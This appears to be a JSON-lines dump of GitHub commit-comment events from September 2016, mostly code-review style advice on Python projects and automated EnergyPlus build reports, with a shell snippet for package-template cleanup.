{"id":"4524404106","type":"CommitCommentEvent","actor":{"login":"TimboUK"},"repo":{"name":"cymplecy/scratch_gpio"},"payload":{"comment":{"id":18920280,"position":16,"line":49,"path":"scratchgpio_handler8.py","commit_id":"9b5f9465d865a319f975b4711eaab4e91e8ffbd8","created_at":"2016-09-06T22:53:49Z","updated_at":"2016-09-06T22:53:49Z","body":"@cymplecy just poking around to see how its done, spotted this duplicate"}},"created_at":"2016-09-06T22:53:49Z"}
{"id":"4524404336","type":"CommitCommentEvent","actor":{"login":"QVBA"},"repo":{"name":"zmaster587/AdvancedRocketry"},"payload":{"comment":{"id":18920283,"position":null,"line":null,"path":null,"commit_id":"289d37080f4a8a718058a47771efc57034c8a7d2","created_at":"2016-09-06T22:53:53Z","updated_at":"2016-09-06T22:53:53Z","body":"Yay"}},"created_at":"2016-09-06T22:53:53Z"}
{"id":"4524407452","type":"CommitCommentEvent","actor":{"login":"karinies"},"repo":{"name":"karinies/coast"},"payload":{"comment":{"id":18920306,"position":null,"line":null,"path":null,"commit_id":"56fec6b76ed8a54af346b78a5cc21252178228cc","created_at":"2016-09-06T22:54:43Z","updated_at":"2016-09-06T22:54:43Z","body":"In addition to serialize bug fix, this commit also contained code updates submitted by Michael.  These updates improve the readability of the code."}},"created_at":"2016-09-06T22:54:43Z"}
{"id":"4524410396","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"blakev/lys"},"payload":{"comment":{"id":18920314,"position":244,"line":200,"path":"lys/__init__.py","commit_id":"f8374b4d76dc28e00e77f869700d2bcc6a44d032","created_at":"2016-09-06T22:55:25Z","updated_at":"2016-09-06T22:55:25Z","body":"you likes spaces  :smile: I'm gonna do a re-formatting on top of that so it's more \"my style\""}},"created_at":"2016-09-06T22:55:25Z"}
{"id":"4524411437","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920315,"position":57,"line":336,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:55:41Z","updated_at":"2016-09-06T22:55:41Z","body":"Blank lines should not spaces for indentation. To see these in Sublime, do:\r\n- `Ctrl+Shift+P > Install Package`\r\n- Type in `TrailingSpaces` and hit Enter.\r\n\r\nBad spaces should now be highlighted in pink."}},"created_at":"2016-09-06T22:55:41Z"}
{"id":"4524416540","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920331,"position":79,"line":481,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:56:58Z","updated_at":"2016-09-06T22:56:58Z","body":"Break a long string as follows:\r\n\r\n```\r\n            else:\r\n                warnings.warn(\r\n                    \"Encountered a zero-length column name. Please \"\r\n                    \"revise the .csv such that all columns have headers.\")\r\n```"}},"created_at":"2016-09-06T22:56:58Z"}
{"id":"4524419212","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920338,"position":79,"line":481,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:57:42Z","updated_at":"2016-09-06T22:57:42Z","body":"Please using single quote `'` rather than double quote `\"` for strings in code."}},"created_at":"2016-09-06T22:57:42Z"}
{"id":"4524420482","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920341,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T22:57:59Z","updated_at":"2016-09-06T22:57:59Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2331 of 2334 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T22:57:59Z"}
{"id":"4524421793","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18920345,"position":null,"line":null,"path":null,"commit_id":"7f4395d3050f8d76db9b9d69375be9677e3b19d7","created_at":"2016-09-06T22:58:18Z","updated_at":"2016-09-06T22:58:18Z","body":"👍 "}},"created_at":"2016-09-06T22:58:18Z"}
{"id":"4524424785","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920360,"position":null,"line":null,"path":null,"commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:59:05Z","updated_at":"2016-09-06T22:59:05Z","body":"Please read `https://github.com/probcomp/bayeslite/blob/master/HACKING`, and `https://github.com/probcomp/cgpm/blob/master/HACKING` for the code conventions."}},"created_at":"2016-09-06T22:59:05Z"}
{"id":"4524433508","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920385,"position":36,"line":315,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T23:01:18Z","updated_at":"2016-09-06T23:01:18Z","body":"Comments usually go on previous line, not on the same line, for readability."}},"created_at":"2016-09-06T23:01:18Z"}
{"id":"4524446379","type":"CommitCommentEvent","actor":{"login":"trevordmiller"},"repo":{"name":"trevordmiller/nova-vim"},"payload":{"comment":{"id":18920436,"position":null,"line":null,"path":null,"commit_id":"0ad8ef947325000fbfa6a8885539538a308cab68","created_at":"2016-09-06T23:04:26Z","updated_at":"2016-09-06T23:04:26Z","body":"We decided to revert this in 1.0.2."}},"created_at":"2016-09-06T23:04:26Z"}
{"id":"4524450078","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920459,"position":6,"line":84,"path":"src/ast.py","commit_id":"fb35678123d442ab53a3da45c9354977a4301c3e","created_at":"2016-09-06T23:05:24Z","updated_at":"2016-09-06T23:05:24Z","body":"Please use consistent style with rest of code, i.e.\r\n```\r\n### BQL Model Definition Language\r\nGuessSchema = namedtuple('GuessSchema', [\r\n    'table'\r\n])\r\n```\r\nAlso observe for consistency that the sequence of definitions of the `namedtuples` (i.e. `PopGuessVars`, `PopIgnoreVars`, etc) in this block do not have any newlines in between them."}},"created_at":"2016-09-06T23:05:24Z"}
{"id":"4524453247","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":18920470,"position":null,"line":null,"path":null,"commit_id":"68cb686d55b6726500d628ddcd11cca1ccc40e07","created_at":"2016-09-06T23:06:15Z","updated_at":"2016-09-06T23:06:15Z","body":"I am not pretty sure whether this depends on `git`.  I remove it because I see `build()` just copy tarball and run `go run build.go -no-upgrade -version v$version build`. If I am wrong, feel free to add `git` back. "}},"created_at":"2016-09-06T23:06:15Z"}
{"id":"4524453646","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18920474,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-06T23:06:21Z","updated_at":"2016-09-06T23:06:21Z","body":"I'll remove that and make it read the port from the usersettings as well xD And I'll also remove the webserver thread from the main0.py, since it's better to see the logs and have them separate anyway."}},"created_at":"2016-09-06T23:06:21Z"}
{"id":"4524453646","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18920474,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-06T23:06:21Z","updated_at":"2016-09-06T23:06:21Z","body":"I'll remove that and make it read the port from the usersettings as well xD And I'll also remove the webserver thread from the main0.py, since it's better to see the logs and have them separate anyway."}},"created_at":"2016-09-06T23:06:21Z"}
{"id":"4524454670","type":"CommitCommentEvent","actor":{"login":"aaronlehmann"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920477,"position":49,"line":55,"path":"manager/scheduler/nodeset.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:06:38Z","updated_at":"2016-09-06T23:06:38Z","body":"The `continue` conditions are caused by invalid preferences. If one of the preferences is invalid, that level of the tree will be skipped. The same one should be skipped for every node, so I don't think it will produce an invalid tree."}},"created_at":"2016-09-06T23:06:38Z"}
{"id":"4524454722","type":"CommitCommentEvent","actor":{"login":"SkyFire"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":18920478,"position":3,"line":5,"path":"README.txt","commit_id":"636e41a77158580186cec6668db66dec0436b858","created_at":"2016-09-06T23:06:40Z","updated_at":"2016-09-06T23:06:40Z","body":"The opcodes are incorrect for build 18414. Just so you know."}},"created_at":"2016-09-06T23:06:40Z"}
{"id":"4524457507","type":"CommitCommentEvent","actor":{"login":"gt22"},"repo":{"name":"Robot1Creatix/RandomFoodMod"},"payload":{"comment":{"id":18920486,"position":5,"line":157,"path":"src/main/java/com/gt22/gt22core/baseclasses/tileEntity/TileWithInventory.java","commit_id":"c813d9dc8f38d05ae3ca5e3232b46fce63117993","created_at":"2016-09-06T23:07:27Z","updated_at":"2016-09-06T23:07:27Z","body":"WHY MOJANGS!!! WHY!!!"}},"created_at":"2016-09-06T23:07:27Z"}
{"id":"4524459675","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920490,"position":55,"line":388,"path":"src/guess.py","commit_id":"9fd5c25ddb4c0ee00bcb8cf0fedb0b146424ed9a","created_at":"2016-09-06T23:08:05Z","updated_at":"2016-09-06T23:08:05Z","body":"As before, comments should be a separate line, and written as full sentences with a space after the `#`, i.e.\r\n```\r\n        # Strip last semicolon and newline - not needed at end of schema.\r\n        schema = schema[:-2]\r\n\r\n```"}},"created_at":"2016-09-06T23:08:05Z"}
{"id":"4524460885","type":"CommitCommentEvent","actor":{"login":"dmarkha1"},"repo":{"name":"dmarkha1/planets"},"payload":{"comment":{"id":18920491,"position":null,"line":null,"path":null,"commit_id":"098454f48732efbec3fee7ff4fba3c81db9ce91d","created_at":"2016-09-06T23:08:26Z","updated_at":"2016-09-06T23:08:26Z","body":"This seems to be a valid conclusion. Mercury is way too mercurial to be a suitable base."}},"created_at":"2016-09-06T23:08:26Z"}
{"id":"4524461136","type":"CommitCommentEvent","actor":{"login":"nigef"},"repo":{"name":"pyta-uoft/pyta"},"payload":{"comment":{"id":18920493,"position":155,"line":155,"path":"python_ta/transforms/setendings.py","commit_id":"4af54241d63867e82eb866b66fc35bf474eee581","created_at":"2016-09-06T23:08:29Z","updated_at":"2016-09-06T23:08:29Z","body":"To determine this, I think we can make an assert to check this precondition, and run the test on all the node types. IIRC it is always set. Furthermore it is set in some cases where AST's `lineno` was not."}},"created_at":"2016-09-06T23:08:29Z"}
{"id":"4524462056","type":"CommitCommentEvent","actor":{"login":"dchacke"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18920494,"position":null,"line":null,"path":null,"commit_id":"128acbb6ebd86e635399074afbd2a5e68dd72f52","created_at":"2016-09-06T23:08:43Z","updated_at":"2016-09-06T23:08:43Z","body":"Is it known how this memory leak would manifest? I'm running on beta-16 and am still running into memory leaks."}},"created_at":"2016-09-06T23:08:43Z"}
{"id":"4524464350","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920495,"position":65,"line":344,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T23:09:23Z","updated_at":"2016-09-06T23:09:23Z","body":"Use `isinstance(cur_guess, str)` rather than `type(cur_guess) == str`."}},"created_at":"2016-09-06T23:09:23Z"}
{"id":"4524464929","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18920500,"position":null,"line":null,"path":null,"commit_id":"4945e4ef2abe172876c47134e323df2621c52754","created_at":"2016-09-06T23:09:33Z","updated_at":"2016-09-06T23:09:33Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/16/violations\n```\nplone/app/drafts/dexterity.py:135:1: C901 'autosave' is too complex (15)\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-06T23:09:33Z"}
{"id":"4524466174","type":"CommitCommentEvent","actor":{"login":"nigef"},"repo":{"name":"pyta-uoft/pyta"},"payload":{"comment":{"id":18920503,"position":123,"line":123,"path":"python_ta/transforms/setendings.py","commit_id":"4af54241d63867e82eb866b66fc35bf474eee581","created_at":"2016-09-06T23:09:53Z","updated_at":"2016-09-06T23:09:53Z","body":"Nice improvement. I see the transform function is called if the lambda 'predicate' evaluates to True. neat."}},"created_at":"2016-09-06T23:09:53Z"}
{"id":"4524466596","type":"CommitCommentEvent","actor":{"login":"mreschke"},"repo":{"name":"jplata/repository"},"payload":{"comment":{"id":18920506,"position":null,"line":null,"path":null,"commit_id":"b71f585337ad73ddfd3f1218a29ee48e40b15594","created_at":"2016-09-06T23:09:59Z","updated_at":"2016-09-06T23:09:59Z","body":"Need to review the reset() method?"}},"created_at":"2016-09-06T23:09:59Z"}
{"id":"4524467726","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920508,"position":24,"line":303,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T23:10:18Z","updated_at":"2016-09-06T23:10:18Z","body":"Use `.` at end of documentation for a parameter."}},"created_at":"2016-09-06T23:10:18Z"}
{"id":"4524469265","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920512,"position":49,"line":55,"path":"manager/scheduler/nodeset.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:10:42Z","updated_at":"2016-09-06T23:10:42Z","body":"Should this `if` moves to below `spread := pref.GetSpread()` block? In the case that most `pref` are invalid, `tree.tasks` already added the node's tasks multiple times. "}},"created_at":"2016-09-06T23:10:42Z"}
{"id":"4524472405","type":"CommitCommentEvent","actor":{"login":"tsheaff"},"repo":{"name":"fastlane/fastlane"},"payload":{"comment":{"id":18920518,"position":null,"line":null,"path":null,"commit_id":"9d18d6ab6e45944dfad606100ec74e7169f24706","created_at":"2016-09-06T23:11:34Z","updated_at":"2016-09-06T23:11:34Z","body":"👍  ETA on this getting into production?"}},"created_at":"2016-09-06T23:11:34Z"}
{"id":"4524479819","type":"CommitCommentEvent","actor":{"login":"utack"},"repo":{"name":"abrensch/brouter"},"payload":{"comment":{"id":18920542,"position":null,"line":null,"path":null,"commit_id":"f5b6e13a260572ad24a6c7a706acfd7cd948508a","created_at":"2016-09-06T23:13:37Z","updated_at":"2016-09-06T23:13:37Z","body":"Thanks for the \"debugging method\"\r\nShould ways be identified this way be fixed in OSM?"}},"created_at":"2016-09-06T23:13:37Z"}
{"id":"4524483211","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920555,"position":36,"line":319,"path":"src/guess.py","commit_id":"a833bb35868022d626bab4df6705b3d6de8915cd","created_at":"2016-09-06T23:14:33Z","updated_at":"2016-09-06T23:14:33Z","body":"In the future, better to use the `StringIO` class which is a string builder in python, rather than concatenating a string."}},"created_at":"2016-09-06T23:14:33Z"}
{"id":"4524492837","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18920574,"position":null,"line":null,"path":null,"commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-06T23:17:13Z","updated_at":"2016-09-06T23:17:13Z","body":"@asmecher"}},"created_at":"2016-09-06T23:17:13Z"}
{"id":"4524505091","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920603,"position":107,"line":390,"path":"src/guess.py","commit_id":"a833bb35868022d626bab4df6705b3d6de8915cd","created_at":"2016-09-06T23:20:42Z","updated_at":"2016-09-06T23:20:42Z","body":"In Python, format strings are used rather than `+`, for these operations i.e.:\r\n`schema += 'MODEL %s AS %s;' % (var, guessed_type.upper(),)`.\r\nAlternatively, see the `.format` [method of str](https://docs.python.org/2/library/string.html#format-string-syntax)."}},"created_at":"2016-09-06T23:20:42Z"}
{"id":"4524505602","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920604,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-06T23:20:50Z","updated_at":"2016-09-06T23:20:50Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-06T23:20:50Z"}
{"id":"4524510226","type":"CommitCommentEvent","actor":{"login":"amorag"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18920628,"position":null,"line":null,"path":null,"commit_id":"34fdeb0090aee4e828fb484c5568fc1a4a1d9fcd","created_at":"2016-09-06T23:22:14Z","updated_at":"2016-09-06T23:22:14Z","body":"Yes, this is the idea. ;)\r\n\r\nI have two concerns and two suggestions:\r\n- I don't understand why the dashed line meaning (available data) applies also to the expertise knowledge and to the prediction, I think these are different concepts and maybe these boxes should be different (not dashed, for instance). ;)\r\n- Not all the pre-sales data are 'part of the book', I mean, these data are those which can be known in advance the book is launched, but in our case, they are also things like the number of selling points, the price, the binding, or the weeks on sale, which are set by the publishing company. However, I don't exactly know how to show this in the graph without complicating it too much... has anybody an idea to show this?\r\nOtherwise, maybe it could remain as it is now.\r\n- Instead of 'Proposed linear regression models' I would write 'Obtained linear regression models'.\r\n- This is a stupid thing, I know, but I see the new box/table a bit different from the rest, maybe the border should be also 'curved' as the rest of boxes. :D\r\n\r\nThanks."}},"created_at":"2016-09-06T23:22:14Z"}
{"id":"4524518462","type":"CommitCommentEvent","actor":{"login":"toto850105"},"repo":{"name":"HackerSir/PinballQA"},"payload":{"comment":{"id":18920690,"position":null,"line":null,"path":null,"commit_id":"7ba6f7ec9ce690b7eac1f3261133df86f7422e4d","created_at":"2016-09-06T23:24:28Z","updated_at":"2016-09-06T23:24:28Z","body":"也不是我出的"}},"created_at":"2016-09-06T23:24:28Z"}
{"id":"4524522609","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920706,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-06T23:25:38Z","updated_at":"2016-09-06T23:25:38Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2368 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-06T23:25:38Z"}
{"id":"4524525547","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920725,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-06T23:26:28Z","updated_at":"2016-09-06T23:26:28Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T23:26:28Z"}
{"id":"4524525763","type":"CommitCommentEvent","actor":{"login":"JhonNeto"},"repo":{"name":"vsouto/watchoverme"},"payload":{"comment":{"id":18920727,"position":4,"line":17,"path":"resources/views/posts/show.blade.php","commit_id":"1644054c2dcb76119477908c3483d7b9fc2a4ba7","created_at":"2016-09-06T23:26:32Z","updated_at":"2016-09-06T23:26:32Z","body":"(margin-left: 4%; margin-right: 16%)\r\nDeixava -20% do total da área da postagem tornando a leitura em certas hora desconfortável "}},"created_at":"2016-09-06T23:26:32Z"}
{"id":"4524528791","type":"CommitCommentEvent","actor":{"login":"saintstack"},"repo":{"name":"xfxyjwf/protobuf"},"payload":{"comment":{"id":18920750,"position":null,"line":null,"path":null,"commit_id":"ed3ecd9693b6918630362727caf0bd3f1731cb03","created_at":"2016-09-06T23:27:23Z","updated_at":"2016-09-06T23:27:23Z","body":"This change never made it in to pb3? What was the problem? Thanks."}},"created_at":"2016-09-06T23:27:23Z"}
{"id":"4524529525","type":"CommitCommentEvent","actor":{"login":"balajivenki"},"repo":{"name":"Netflix/dyno"},"payload":{"comment":{"id":18920760,"position":36,"line":44,"path":"dyno-core/src/main/java/com/netflix/dyno/connectionpool/impl/lb/HttpEndpointBasedTokenMapSupplier.java","commit_id":"e38f719636c35902774fd2821ff224c1e13a097d","created_at":"2016-09-06T23:27:34Z","updated_at":"2016-09-06T23:27:34Z","body":"This is missing the url \r\n\r\n`private static final String DefaultServerUrl = \"http://{hostname}:{port}/REST/v1/admin/cluster_describe\";`\r\n\r\n"}},"created_at":"2016-09-06T23:27:34Z"}
{"id":"4524541696","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18920823,"position":null,"line":null,"path":null,"commit_id":"00d550cdabd63b180ff81d771f7f2e3e15e6abb7","created_at":"2016-09-06T23:31:10Z","updated_at":"2016-09-06T23:31:10Z","body":"this template produces of broken symlinks: mount-FULL, etc\r\n\r\nthis code for FIXUPHACK produces a complete puppy compatible template, lines can be added to delete unneeded apps, although the processed pkg is 650KB xz compressed.\r\n\r\n\r\n\t#--------------------\r\n\t# special -FULL apps\r\n\t#--------------------\r\n\r\n\tfind . \\( -name losetup -o -name mount -o -name umount \\) |\r\n\t\twhile read file ; do\r\n\t\t\tif [ ! -L \"$file\" ] ; then\r\n\t\t\t\tmv $file ${file}-FULL\r\n\t\t\telse\r\n\t\t\t\trm $file\r\n\t\t\tfi\r\n\t\tdone\r\n\r\n\t#----------------------\r\n\t# remove unwanted dirs\r\n\t#----------------------\r\n\r\n\tfind . -type d | sed '\\%^./usr$%d' | sort |\r\n\t\twhile read dir ; do\r\n\t\t\tcase $dir in\r\n\t\t\t\t\".\") continue ;;\r\n\t\t\t\t*\"/bin\"*|*\"/sbin\"*|*\"/lib\"*) ok=1 ;;\r\n\t\t\t\t*) rm -rf $dir ;;\r\n\t\t\tesac\r\n\t\tdone\r\n\r\n\t#------\r\n\t# extra\r\n\t#------\r\n\r\n\tmkdir -p var/lock/subsys\r\n\r\n"}},"created_at":"2016-09-06T23:31:10Z"}
{"id":"4524543843","type":"CommitCommentEvent","actor":{"login":"7ossam81"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18920830,"position":null,"line":null,"path":null,"commit_id":"34fdeb0090aee4e828fb484c5568fc1a4a1d9fcd","created_at":"2016-09-06T23:31:48Z","updated_at":"2016-09-06T23:31:48Z","body":"I would suggest \"Developed regression models\" instead, since not all the developed models are linear models. "}},"created_at":"2016-09-06T23:31:48Z"}
{"id":"4524543933","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18920831,"position":47,"line":2082,"path":"data/graphics.js","commit_id":"b4536dc69d236e187f28fdb39e657e11f78a85f2","created_at":"2016-09-06T23:31:49Z","updated_at":"2016-09-06T23:31:49Z","body":"Comma dangle... why didn't Travis complain about this?"}},"created_at":"2016-09-06T23:31:49Z"}
{"id":"4524544690","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18920836,"position":null,"line":null,"path":null,"commit_id":"2d175239499ea474869857b515e823a00f87e681","created_at":"2016-09-06T23:32:04Z","updated_at":"2016-09-06T23:32:04Z","body":"Does this work?"}},"created_at":"2016-09-06T23:32:04Z"}
{"id":"4524546401","type":"CommitCommentEvent","actor":{"login":"uwetews"},"repo":{"name":"smarty-php/smarty"},"payload":{"comment":{"id":18920839,"position":null,"line":null,"path":null,"commit_id":"e1d27d68d77eb32f3d6daeecc6831d6eabe171d0","created_at":"2016-09-06T23:32:33Z","updated_at":"2016-09-06T23:32:33Z","body":"require_once and include_once is much slower than a call of is_callable(). Don't ask me why."}},"created_at":"2016-09-06T23:32:33Z"}
{"id":"4524549241","type":"CommitCommentEvent","actor":{"login":"nigef"},"repo":{"name":"pyta-uoft/pyta"},"payload":{"comment":{"id":18920845,"position":195,"line":195,"path":"python_ta/transforms/setendings.py","commit_id":"4af54241d63867e82eb866b66fc35bf474eee581","created_at":"2016-09-06T23:33:26Z","updated_at":"2016-09-06T23:33:26Z","body":"should we add `node.col_offset is not None` to the assert?"}},"created_at":"2016-09-06T23:33:26Z"}
{"id":"4524551811","type":"CommitCommentEvent","actor":{"login":"tylerdola"},"repo":{"name":"kvangent/PokeAlarm"},"payload":{"comment":{"id":18920850,"position":7,"line":46,"path":"alarms/alarm_manager.py","commit_id":"c1d089f0b7a420aa429dd1929e29bbbe13888373","created_at":"2016-09-06T23:34:13Z","updated_at":"2016-09-06T23:34:13Z","body":"Should modify this to be \"elif\"."}},"created_at":"2016-09-06T23:34:13Z"}
{"id":"4524555177","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920860,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T23:35:11Z","updated_at":"2016-09-06T23:35:11Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2330 of 2332 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a 